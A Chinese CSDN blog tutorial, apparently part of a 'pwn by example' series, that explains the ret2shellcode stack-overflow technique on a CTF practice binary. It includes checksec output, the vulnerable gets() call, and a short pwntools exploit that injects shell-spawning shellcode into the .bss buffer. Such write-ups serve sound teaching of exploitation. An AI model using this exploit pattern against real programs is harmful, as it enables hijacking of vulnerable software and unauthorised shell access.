pwn by example(二)

最新推荐文章于 2023-07-15 17:11:48 发布
最新推荐文章于 2023-07-15 17:11:48 发布
阅读量462 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36992198/article/details/80543224
版权
ret2shellcode

原理

ret2shellcode需要我们控制程序执行shellcode代码。而所谓的shellcode指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的shell。一般来说,shellcode都需要我们自己去填充。这其实是另外一种典型的利用的方法,即此时我们需要自己去填充一些可执行的代码。

而在栈溢出的基础上,我们一般都是向栈中写内容,所以要想执行shellcode,需要对应的binary文件没有开启NX保护。

实际利用过程

运行下这个程序发现,只有简单的输入

检查程序的安全保护措施,发现NX没有开启,也就是说栈中的数据有执行的权限哈,可以往栈中写数据。

  Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
放到ida里看一下

  gets((char *)&v4);存在明显的栈溢出漏洞

 strncpy(buf2, (const char *)&v4, 0x64u);

把用户的输入复制到buf2中。

分析可知,buf2是bss段。BSS(Block Started by Symbol)通常是指用来存放程序中未初始化的全局变量静态变量的一块内存区域。特点是:可读写的,在程序执行之前BSS段会自动清0。所以,未初始的全局变量在程序执行之前已经成0了。

控制程序执行shellcode,也就是读入shellcode,然后控制程序执行bss段处的shellcode

附exp:

from pwn import *
context.binary='./ret2shellcode'
p=process('./ret2shellcode')
shellcode=asm(shellcraft.sh())
buf_2=0x0804a080
p.sendline(shellcode.ljust(112,'a')+p32(buf_2))
p.interactive()



木木or沐沐
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pwn小白入门05---ret2syscall
weixin_45943522的博客
02-21 3317
ret2syscall ROP原理: 随着 NX 保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是 ROP(Return Oriented Programming),其主要思想是在栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。 gadget: 所谓 gadgets 就是以 ret 结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。
PWN-shellcode-WP- (一)题目文件.rar
03-29
为几道搜集的真题,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真题。
PWN保护机制以及编译方法
逆向萌新的博客
11-07 2513
PWN保护机制以及编译方法
ret2shellcode
qq_45691294的博客
12-18 4618
shellcode的含义: 在栈溢出的攻击技术中通常是要控制函数的返回地址到自己想要的地方执行自己想要执行的代码。ret2shellcode代表返回到shellcode中即控制函数的返回地址到预先设定好的shellcode区域中去执行shellcode代码,这是非常危险的。 这里学习一下shellcode的利用方式,用ret2shellcode作为例题 先用checksec查看一下保护,可以看到,没有开启任何保护机制,且是一个32位的程序 使用IDA分析程序,只发现了主函数,并没有发现后门函数 get
shellcode基本知识(PWN
weixin_51758733的博客
07-15 830
shellcode基本知识(PWN
2021-鹏城实验室-pwn-babyheap.zip
09-28
在本文中,我们将深入探讨2021年鹏城实验室的"Pwn-BabyHeap"挑战,这是一道涉及进制安全和pwn技术的竞赛题目。本题主要考察了"off-by-null"漏洞的利用,这是一个在C语言编程中常见的安全问题。我们将围绕这个主题...
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
welpwn pwn 入门题
02-11
pwn 入门题
2024NKCTF-pwn
最新发布
03-25
2024NKCTF_pwn
ciscn-2019-pwn
11-29
【压缩包子文件的文件名称列表】与描述中的挑战相对应,每个文件可能是这些挑战的源代码、进制文件或者相关数据。参赛者可能需要分析这些文件来找出漏洞,构建exploit(利用程序),并通过网络连接到运行这些程序...
字符串溢出(pwn溢出)--ret2shellcode
莫慌的博客
09-26 2060
pwn 入门
PWN · ret2shellcode】[HNCTF 2022 Week1]ret2shellcode
Mr_Fmnwon的博客
04-25 2810
ret2shellcode——顾名思义,控制执行流到shellcode在更简单的一类题目ret2text中,我们主要的尝试是修改某个返回地址修改,修改到程序固有的后门函数处,劫持程序控制流以期返回后门。然而,如果程序中并不存在这样的后门函数,那么很朴素的想法是,能不能自己写一段后门函数,然后劫持程序控制流返回执行这段恶意代码呢?依此,主要的过程如下:(1)构造shellcode通过溢出放到程序某片存储空间上——为了能够执行这段代码,所存储的区域需要有可执行的权限。
简单的PWN学习-ret2shellcode
weixin_48421613的博客
07-05 818
最近在学习pwn,这是一道2016年的pwn题目,主要学习关于栈溢出以及劫持栈指针达到命令执行的效果,笔者水平较差,请轻喷
简单的PWN堆栈溢出的尝试
weixin_48421613的博客
06-20 460
这是一道2018年的PWN的简单试题
进制学习(pwn)-shellcode
liulanghouzi的博客
09-21 1575
帮助进制安全爱好者入门~
pwn小白入门04---ret2shellcode
weixin_45943522的博客
02-21 1848
原理 ret2shellcode,当程序当中没有system函数时,我们需要自己往栈上写入一段shellcode,然后控制eip使其指向shellcode的地址。 shellcode 指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的 shell。 在栈溢出的基础上,要想执行 shellcode,需要对应的程序在运行时,shellcode 所在的区域具有可执行权限。即必须关闭堆栈不可执行功能。 例题(来自ctfwiki): 首先checksec: 发现程序没有开启任何保护,并且存在可读可写
W-L学习打卡(7.8)
weixin_50166464的博客
07-08 152
突然发现好快就要去W-7城市,时间已经不多了,想好好躺几天,不过每天睡到十点是大可不行了,老睡这么晚感觉把握不住时间了,明天开始十点半 十点 慢慢调整回九点,话不多说,写list了。--7.8 7.8 To do list: 1.Pwn笔记大杂烩出场 2.Cpp看完第七章 3.快速排序复现 4.每日锻炼 ...
Ret2ShellCode
钞sir的博客
01-24 8144
红颜祸 千般柔情 相思难解两相若 蝶恋花 几经浮沉 枯骨终是化飞沙 简介 ret2shellcode顾名思义,就是return to shellcode,即让程序中某个函数执行结束后,返回到shellcode的地址去执行shellcode,得到system(sh)的效果;ret2shellcode是栈溢出中一种简单而且常规的操作,当配合ROP等技术的使用后,非常有用 利用条件 ret2shel...
其它栈溢出技巧
听鬼哥说故事
08-29 5932
其它栈溢出技巧
进制利用入门:Pwn挑战解析
在网络安全领域,"pwn"是一种专门针对进制漏洞利用的技术,它涉及到如何利用软件中的安全漏洞来控制或破坏系统。"Introduction to Pwn"这份手册是为那些对中级到高级的pwn挑战感兴趣的读者准备的。 首先,让我们...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值